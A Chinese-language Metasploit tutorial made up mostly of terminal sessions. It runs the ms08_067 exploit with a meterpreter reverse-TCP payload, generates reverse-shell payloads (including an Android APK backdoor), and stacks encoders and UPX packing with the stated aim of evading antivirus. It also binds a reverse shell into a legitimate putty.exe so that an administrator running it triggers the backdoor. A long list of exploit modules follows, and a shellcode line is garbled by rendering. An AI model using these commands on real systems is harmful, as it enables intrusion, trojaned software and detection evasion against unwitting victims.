exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi RHOST=192.168.1.168 PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=5546 E
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[] Initializing modules…
RHOST => 192.168.1.168
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.10
LPORT => 5546
[-] Handler failed to bind to 192.168.1.10:5546
[
] Started reverse handler on 0.0.0.0:5546
下面我们介绍我们会经常用到的一个参数,msfpayload,执行msfpayload -h,帮助文件显示的似乎很简单,我们对每个参数的功能做详细的介绍:
exploit@ubuntu:/pentest/framework3$ msfpayload -h
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Usage: /usr/local/bin/msfpayload [] [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]|s[O]>
OPTIONS:
-h Help banner
-l List available payloads
msfpayload 操作选项 payload模块 变量定义 生成的文件格式,目前支持的格式有:C代码,C#代码,perl代码,ruby代码,Raw文件流,Js代码,exe文件,dll文件,vba文件,War文件,apk文件,python文件,
如,我们想生成一个通过反弹tcp端口的perl文件格式的payload,那么我们执行以下操作
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=5546 P >back.pl[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
ok接下来我们查看该文件是否生成,文件内容是什么
exploit@ubuntu:/pentest/framework3$ head -n 20 back.pl

windows/meterpreter/reverse_tcp - 281 bytes (stage 1)

http://www.metasploit.com

VERBOSE=false, LHOST=192.168.1.106, LPORT=5546,

ReverseConnectRetries=5, ReverseListenerBindPort=0,

ReverseAllowProxy=false, ReverseListenerThreaded=false,

EnableStageEncoding=false, StageEncoderSaveRegisters=,

StageEncodingFallback=true, PrependMigrate=false,

EXITFUNC=process, AutoLoadStdapi=true,

InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,

EnableUnicodeEncoding=true

my KaTeX parse error: Expected 'EOF', got '\xfc' at position 8: buf = "\̲x̲f̲c̲\xe8\x82\x00\x0… msfpayload -l
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Framework Payloads (356 total)

Name Description


aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server on Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server on Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server on Android. Connect back stager
android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
…………
这样就会列出所有的payload
由于payoad类型太多,我们不知道如何选择适合自己的平台的payload,比如我们需要android平台下的payload,那么我们只需要执行以下命令
exploit@ubuntu:/pentest/framework3$ msfpayload -l| grep android
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
android/meterpreter/reverse_http Run a meterpreter server on Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server on Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server on Android. Connect back stager
android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
android/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager
这样所有的android平台下的payload都可以查找出来了,再根据我们的系统平台环境和网络环境选择合适的payload。
有了合适的payload,但是我不知道需要设置哪些参数,那么我们就需要执行下面的参数,这样根据系统提示,我们可以进行我们下一步的操作
exploit@ubuntu:/pentest/framework3$ msfpayload android/meterpreter/reverse_tcp s
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Name: Android Meterpreter, Dalvik Reverse TCP Stager
Module: payload/android/meterpreter/reverse_tcp
Platform: Android
Arch: dalvik
Needs Admin: No
Total size: 8053
Rank: Normal
Provided by:
mihi
egypt
anwarelmakrahy
timwr
Basic options:
Name Current Setting Required Description


AutoLoadAndroid true yes Automatically load the Android extension
LHOST 192.168.189.134 yes The listen address
LPORT 4444 yes The listen port
RetryCount 10 yes Number of trials to be made if connection failed
Description:
Run a meterpreter server on Android. Connect back stager
这样会提示我们需要设置哪些参数,如LHOST,LPORT,是否自动加载,重试连接次数,这样我们就知道下一步如何对我们的payload进行设置操作
这样我们就生成了android平台的apk后门文件,由于msfpayload可以生成不同平台,不同语言的payload,所以在渗透的时候,我们可以根据目标系统的环境,和网络环境,选择我们合适的payload和生成的文件格式。
接下来,我们继续介绍metasploit的另外一个比较重要的参数msfencode的用法
exploit@ubuntu:/pentest/framework3$ msfencode -h
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Usage: /usr/local/bin/msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: ‘\x00\xff’
-c The number of times to encode the data
-d Specify the directory in which to look for EXE templates
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
-v Increase verbosity
-x Specify an alternate executable template
这里我们就其参数做一一介绍:
-a 指定CPU 的类型,
-b 指定需要去除的字符,帮助中的示例00 ff 这两种数值在网络传送中会被截断造成传送失败
-c 指定编码次数,
-d 指定exe模板搜索路径,
-i 指定要编码的数据文件
-k 设置生成的文件运行后的payload进程与模板文件进程分离。
-l 列出可用payload
-n 输出编码器信息
-o 输出文件
-p 指定编码平台
-s 指定编码后的字节数(payload的)
-t 加密后文件的输出格式,支持以下格式:bash,c,c#,dword,java,js_be,js_le,数字型(num),perl文件,pl后缀文件,powershell格式文件,ps1格式文件,py,python,raw,rb,ruby,sh,vbapplaction,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small.loop-vbs.macho,msi,msi_nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,war
-v 显示当前msfencode的版本信息
-x 指定一个备用的可执行文件模版
msfencode可以对我们的payload进行加密,一般是和msfpayload配合使用,当然,也可以单独对已有的文件模版进行加密,支持多种文件格式,并且支持多种加密方式,这里我们先看看msfencode支持哪些类型的加密方式
exploit@ubuntu:/pentest/framework3$ msfencode -l
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Framework Encoders

Name Rank Description


cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The “none” Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

上面列出了可以用的加密格式和等级,还是要根据我们系统的安全级别,杀毒软件以及其他防护软件来选择我们合适的加密方式以便绕过这些限制措施。空谈误国,我们还是看看实际的操作。
首先,在我的本地有个a.exe,是我们其他工具生成的木马服务端,由于需要免杀,有没有专门做免杀的程序狗和逆向狗,没事,自己动手丰衣足食,用msfencode来解决你的困扰。
我们用msfpayload来生成一个反弹的程序,通过msfencode来进行加密,规避杀毒软件的查杀。
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 7 -t exe -o payload.exe
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[] x86/shikata_ga_nai succeeded with size 308 (iteration=1)
[
] x86/shikata_ga_nai succeeded with size 335 (iteration=2)
[] x86/shikata_ga_nai succeeded with size 362 (iteration=3)
[
] x86/shikata_ga_nai succeeded with size 389 (iteration=4)
[] x86/shikata_ga_nai succeeded with size 416 (iteration=5)
[
] x86/shikata_ga_nai succeeded with size 443 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 470 (iteration=7)
当然,这里只用了一种加密方式,经过了7次加密,也可以采用多种加密方式的多重加密,这样大部分的杀毒软件都变哑巴了
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/bloxor -c 3 -t raw | msfencode -e x86/countdown -c 5 -t exe -o av.exe
[!] ************************************************************************[!] *********************************************************[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[
] x86/shikata_ga_nai succeeded with size 308 (iteration=1)
[
] x86/shikata_ga_nai succeeded with size 335 (iteration=2)
[
] x86/shikata_ga_nai succeeded with size 362 (iteration=3)
[
] x86/shikata_ga_nai succeeded with size 389 (iteration=4)
[
] x86/shikata_ga_nai succeeded with size 416 (iteration=5)
[
] x86/shikata_ga_nai succeeded with size 443 (iteration=6)
[
] x86/shikata_ga_nai succeeded with size 470 (iteration=7)
[
] x86/bloxor succeeded with size 547 (iteration=1)
[
] x86/bloxor succeeded with size 617 (iteration=2)
[
] x86/bloxor succeeded with size 677 (iteration=3)
[
] x86/countdown succeeded with size 695 (iteration=1)
[
] x86/countdown succeeded with size 713 (iteration=2)
[
] x86/countdown succeeded with size 731 (iteration=3)
[
] x86/countdown succeeded with size 749 (iteration=4)
[
] x86/countdown succeeded with size 767 (iteration=5)
最后生成av.exe,这里我们可以测试一下生成的exe是否可以正常运行,丢到windows里面运行一下,请自行测试,我就不截图了。
如果运行正常,还不放心杀毒软件会干掉,那么我们再用upx加个壳?
exploit@ubuntu:/pentest/framework3$ upx -5 av.exe
Ultimate Packer for eXecutables
Copyright © 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013
File size Ratio Format Name


73802 -> 48128 65.21% win32/pe av.exe
Packed 1 file.
这种的生成的payload运行之后,没有什么反应,如果是作为渗透者自己来用的话,可能会做的比较隐蔽,有时候我们需要管理员或者目标主机上的其他人来触发这些payload程序,那么我们就需要用到比较隐蔽和猥琐的触发方式了,用标准的官方语言说就是:建立以标准文件模版为基础的payload文件,通俗点说就是搞个捆绑器,把shellcode我们正常的程序捆绑在一起,当管理员运行正常程序的时,就会触发我们的payload后门
a.exe是一个正常的putty程序,我们把shellcode和putty捆绑在一起生成一个新的程序
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -k -x /pentest/framework3/a.exe -o putty.exe
[!] *********************************************************************[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[
] x86/shikata_ga_nai succeeded with size 308 (iteration=1)
[
] x86/shikata_ga_nai succeeded with size 335 (iteration=2)
[
] x86/shikata_ga_nai succeeded with size 362 (iteration=3)

可以看到我们生成了新的putty.exe,只需要替换掉原来的putty.exe即可,当管理员运行我们加工后的putty.exe时,就会触发我们的后门。
前面提到了,我们要对原本已经有的,比如通过其他的木马生成器生成的木马服务端进行免杀,那我们同样可以使用这样的模式来进行免杀,看实际的操作例子,这里的a是我们原始的putty文件,payload是我们生成的木马服务端,通过捆绑免杀,生成新的putty.exe
exploit@ubuntu:/pentest/framework3$ msfencode -i /pentest/framework3/payload.exe -e x86/shikata_ga_nai -c 5 -x -k /pentest/framework3/a.exe -o putty.exe
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[] x86/shikata_ga_nai succeeded with size 73831 (iteration=1)
[
] x86/shikata_ga_nai succeeded with size 73860 (iteration=2)
[] x86/shikata_ga_nai succeeded with size 73889 (iteration=3)
[
] x86/shikata_ga_nai succeeded with size 73918 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 73947 (iteration=5)
接下来介绍msfvenom,msfvenom兼顾了msfencode和msfpayload的功能,所以将逐步替代msfencode和msfpayload,先看下参数
exploit@ubuntu:/pentest/framework3$ msfvenom -h
Usage: /usr/local/bin/msfvenom [options]
Options:
-p, --payload Payload to use. Specify a ‘-’ or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled Prepend a nopsled of [length] size on to the payload
-f, --format
Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch The architecture to use
–platform The platform of the payload
-s, --space The maximum size of the resulting payload
-b, --bad-chars The list of characters to avoid example: ‘\x00\xff’
-i, --iterations The number of times to encode the payload
-c, --add-code Specify an additional win32 shellcode file to include
-x, --template Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
–payload-options List the payload’s standard options
-o, --out Save the payload
-v, --var-name Specify a custom variable name to use for certain output formats
-h, --help Show this message
–help-formats List available formats
这里我们对msfvenom的参数一一解释
-p —payload 利用哪个payload来生成
-l —list 列出模块类型: payloads,encoders,nops,all
-n —nopsled

metasploit–exploit模块信息
Name Disclosure Date Rank Description


aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
bsdi/softcart/mercantec_softcart 2004-08-19 great Mercantec SoftCart CGI Overflow
dialup/multi/login/manyargs 2001-12-12 good System V Derived /bin/login Extraneous Arguments Buffer Overflow
freebsd/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)
freebsd/tacacs/xtacacsd_report 2008-01-08 average XTACACSD <= 4.1.2 report() Buffer Overflow
freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great FreeBSD Telnet Service Encryption Key ID Buffer Overflow
hpux/lpd/cleanup_exec 2002-08-28 excellent HP-UX LPD Command Execution
irix/lpd/tagprinter_exec 2001-09-01 excellent Irix LPD tagprinter Command Execution
linux/browser/adobe_flashplayer_aslaunch 2008-12-17 good Adobe Flash Player ActionScript Launch Command Execution Vulnerability
linux/ftp/proftp_sreplace 2006-11-26 great ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
linux/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
linux/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 “secure” Overflow (Linux)
linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
linux/http/ddwrt_cgibin_exec 2009-07-20 excellent DD-WRT HTTP Daemon Arbitrary Command Execution
linux/http/dolibarr_cmd_exec 2012-04-06 excellent Dolibarr ERP & CRM 3 Post-Auth OS Command Injection
linux/http/gpsd_format_string 2005-05-25 average Berlios GPSD Format String Vulnerability
linux/http/linksys_apply_cgi 2005-09-13 great Linksys WRT54 Access Point apply.cgi Buffer Overflow
linux/http/peercast_url 2006-03-08 average PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)
linux/http/piranha_passwd_exec 2000-04-04 excellent RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
linux/http/symantec_web_gateway_exec 2012-05-17 excellent Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
linux/http/symantec_web_gateway_file_upload 2012-05-17 excellent Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability
linux/http/symantec_web_gateway_lfi 2012-05-17 excellent Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability
linux/http/vcms_upload 2011-11-27 excellent V-CMS PHP File Upload and Execute
linux/http/webcalendar_settings_exec 2012-04-23 excellent WebCalendar 1.2.4 Pre-Auth Remote Code Injection
linux/http/webid_converter 2011-07-05 excellent WeBid converter.php Remote PHP Code Injection
linux/ids/snortbopre 2005-10-18 good Snort Back Orifice Pre-Preprocessor Buffer Overflow
linux/imap/imap_uw_lsub 2000-04-16 good UoW IMAP server LSUB Buffer Overflow
linux/madwifi/madwifi_giwscan_cb 2006-12-08 average Madwifi SIOCGIWSCAN Buffer Overflow
linux/misc/accellion_fta_mpipe2 2011-02-07 excellent Accellion File Transfer Appliance MPIPE2 Command Execution
linux/misc/drb_remote_codeexec 2011-03-23 excellent Distributed Ruby Send instance_eval/syscall Code Execution
linux/misc/gld_postfix 2005-04-12 good GLD (Greylisting Daemon) Postfix Buffer Overflow
linux/misc/hp_data_protector_cmd_exec 2011-02-07 excellent HP Data Protector 6.1 EXEC_CMD Remote Code Execution
linux/misc/hplip_hpssd_exec 2007-10-04 excellent HPLIP hpssd.py From Address Arbitrary Command Execution
linux/misc/ib_inet_connect 2007-10-03 good Borland InterBase INET_connect() Buffer Overflow
linux/misc/ib_jrd8_create_database 2007-10-03 good Borland InterBase jrd8_create_database() Buffer Overflow
linux/misc/ib_open_marker_file 2007-10-03 good Borland InterBase open_marker_file() Buffer Overflow
linux/misc/ib_pwd_db_aliased 2007-10-03 good Borland InterBase PWD_db_aliased() Buffer Overflow
linux/misc/lprng_format_string 2000-09-25 normal LPRng use_syslog Remote Format String Vulnerability
linux/misc/netsupport_manager_agent 2011-01-08 average NetSupport Manager Agent Remote Buffer Overflow
linux/mysql/mysql_yassl_getname 2010-01-25 good MySQL yaSSL CertDecoder::GetName Buffer Overflow
linux/mysql/mysql_yassl_hello 2008-01-04 good MySQL yaSSL SSL Hello Message Buffer Overflow
linux/pop3/cyrus_pop3d_popsubfolders 2006-05-21 normal Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
linux/pptp/poptop_negative_read 2003-04-09 great Poptop Negative Read Overflow
linux/proxy/squid_ntlm_authenticate 2004-06-08 great Squid NTLM Authenticate Overflow
linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)
linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow
linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)
linux/ssh/f5_bigip_known_privkey 2012-06-11 excellent F5 BIG-IP SSH Private Key Exposure
linux/telnet/telnet_encrypt_keyid 2011-12-23 great Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
multi/browser/firefox_escape_retval 2009-07-13 normal Firefox 3.5 escape() Return Value Memory Corruption
multi/browser/firefox_queryinterface 2006-02-02 normal Firefox location.QueryInterface() Code Execution
multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
multi/browser/itms_overflow 2009-06-01 great Apple OS X iTunes 8.1.1 ITMS Overflow
multi/browser/java_atomicreferencearray 2012-02-14 excellent Java AtomicReferenceArray Type Violation Vulnerability
multi/browser/java_calendar_deserialize 2008-12-03 excellent Sun Java Calendar Deserialization Privilege Escalation
multi/browser/java_getsoundbank_bof 2009-11-04 great Sun Java JRE getSoundbank file:// URI Buffer Overflow
multi/browser/java_rhino 2011-10-18 excellent Java Applet Rhino Script Engine Remote Code Execution
multi/browser/java_rmi_connection_impl 2010-03-31 excellent Java RMIConnectionImpl Deserialization Privilege Escalation
multi/browser/java_setdifficm_bof 2009-11-04 great Sun Java JRE AWT setDiffICM Buffer Overflow
multi/browser/java_signed_applet 1997-02-19 excellent Java Signed Applet Social Engineering Code Execution
multi/browser/java_trusted_chain 2010-03-31 excellent Java Statement.invoke() Trusted Method Chain Privilege Escalation
multi/browser/mozilla_compareto 2005-07-13 normal Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
multi/browser/mozilla_navigatorjava 2006-07-25 normal Mozilla Suite/Firefox Navigator Object Code Execution
multi/browser/opera_configoverwrite 2007-03-05 excellent Opera 9 Configuration Overwrite
multi/browser/opera_historysearch 2008-10-23 excellent Opera historysearch XSS
multi/browser/qtjava_pointer 2007-04-23 excellent Apple QTJava toQTPointer() Arbitrary Memory Access
multi/fileformat/adobe_u3d_meshcont 2009-10-13 good Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
multi/fileformat/maple_maplet 2010-04-26 excellent Maple Maplet File Creation and Command Execution
multi/fileformat/peazip_command_injection 2009-06-05 excellent PeaZip <= 2.6.1 Zip Processing Command Injection
multi/ftp/wuftpd_site_exec_format 2000-06-22 great WU-FTPD SITE EXEC/INDEX Format String Vulnerability
multi/handler manual Generic Payload Handler
multi/http/activecollab_chat 2012-05-30 excellent Active Collab “chat module” <= 2.3.8 Remote PHP Code Injection Exploit
multi/http/apprain_upload_exec 2012-01-19 excellent appRain CMF Arbitrary PHP File Upload Vulnerability
multi/http/axis2_deployer 2010-12-30 excellent Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)
multi/http/familycms_less_exec 2011-11-29 excellent Family Connections less.php Remote Command Execution
multi/http/freenas_exec_raw 2010-11-06 great FreeNAS exec_raw.php Arbitrary Command Execution
multi/http/gitorious_graph 2012-01-19 excellent Gitorious Arbitrary Command Execution
multi/http/glassfish_deployer 2011-08-04 excellent Sun/Oracle GlassFish Server Authenticated Code Execution
multi/http/horde_href_backdoor 2012-02-13 excellent Horde 3.3.12 Backdoor Arbitrary PHP Code Execution
multi/http/jboss_bshdeployer 2010-04-26 excellent JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
multi/http/jboss_deploymentfilerepository 2010-04-26 excellent JBoss Java Class DeploymentFileRepository WAR Deployment
multi/http/jboss_maindeployer 2007-02-20 excellent JBoss JMX Console Deployer Upload and Execute
multi/http/lcms_php_exec 2011-03-03 excellent LotusCMS 3.0 eval() Remote Command Execution
multi/http/log1cms_ajax_create_folder 2011-04-11 excellent Log1 CMS writeInfo() PHP Code Injection
multi/http/op5_license 2012-01-05 excellent OP5 license.php Remote Command Execution
multi/http/op5_welcome 2012-01-05 excellent OP5 welcome Remote Command Execution
multi/http/php_cgi_arg_injection 2012-05-03 excellent PHP CGI Argument Injection
multi/http/php_volunteer_upload_exec 2012-05-28 excellent PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability
multi/http/phpldapadmin_query_engine 2011-10-24 excellent phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection
multi/http/phpscheduleit_start_date 2008-10-01 excellent phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
multi/http/plone_popen2 2011-10-04 excellent Plone and Zope XMLTools Remote Command Execution
multi/http/pmwiki_pagelist 2011-11-09 excellent PmWiki <= 2.2.34 pagelist.php Remote PHP Code Injection Exploit
multi/http/sit_file_upload 2011-11-10 excellent Support Incident Tracker <= 3.65 Remote Command Execution
multi/http/snortreport_exec 2011-09-19 excellent Snortreport nmap.php/nbtscan.php Remote Command Execution
multi/http/splunk_mappy_exec 2011-12-12 excellent Splunk Search Remote Code Execution
multi/http/spree_search_exec 2011-10-05 excellent Spreecommerce 0.60.1 Arbitrary Command Execution
multi/http/spree_searchlogic_exec 2011-04-19 excellent Spreecommerce < 0.50.0 Arbitrary Command Execution
multi/http/struts_code_exec 2010-07-13 excellent Apache Struts < 2.2.0 Remote Command Execution
multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent Apache Struts <= 2.2.1.1 Remote Command Execution
multi/http/sun_jsws_dav_options 2010-01-20 great Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
multi/http/traq_plugin_exec 2011-12-12 excellent Traq admincp/common.php Remote Code Execution
multi/http/vbseo_proc_deutf 2012-01-23 excellent vBSEO <= 3.6.0 proc_deutf() Remote PHP Code Injection
multi/http/wikka_spam_exec 2011-11-30 excellent WikkaWiki 1.3.2 Spam Logging PHP Injection
multi/ids/snort_dce_rpc 2007-02-19 good Snort 2 DCE/RPC preprocessor Buffer Overflow
multi/misc/batik_svg_java 2012-05-11 excellent Squiggle 1.7 SVG Browser Java Code Execution
multi/misc/hp_vsa_exec 2011-11-11 excellent HP StorageWorks P4000 Virtual SAN Appliance Command Execution
multi/misc/java_rmi_server 2011-10-15 excellent Java RMI Server Insecure Default Configuration Java Code Execution
multi/misc/openview_omniback_exec 2001-02-28 excellent HP OpenView OmniBack II Command Execution
multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent VERITAS NetBackup Remote Command Execution
multi/misc/wireshark_lwres_getaddrbyname 2010-01-27 great Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
multi/misc/wireshark_lwres_getaddrbyname_loop 2010-01-27 great Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
multi/misc/zend_java_bridge 2011-03-28 great Zend Server Java Bridge Arbitrary Java Code Execution
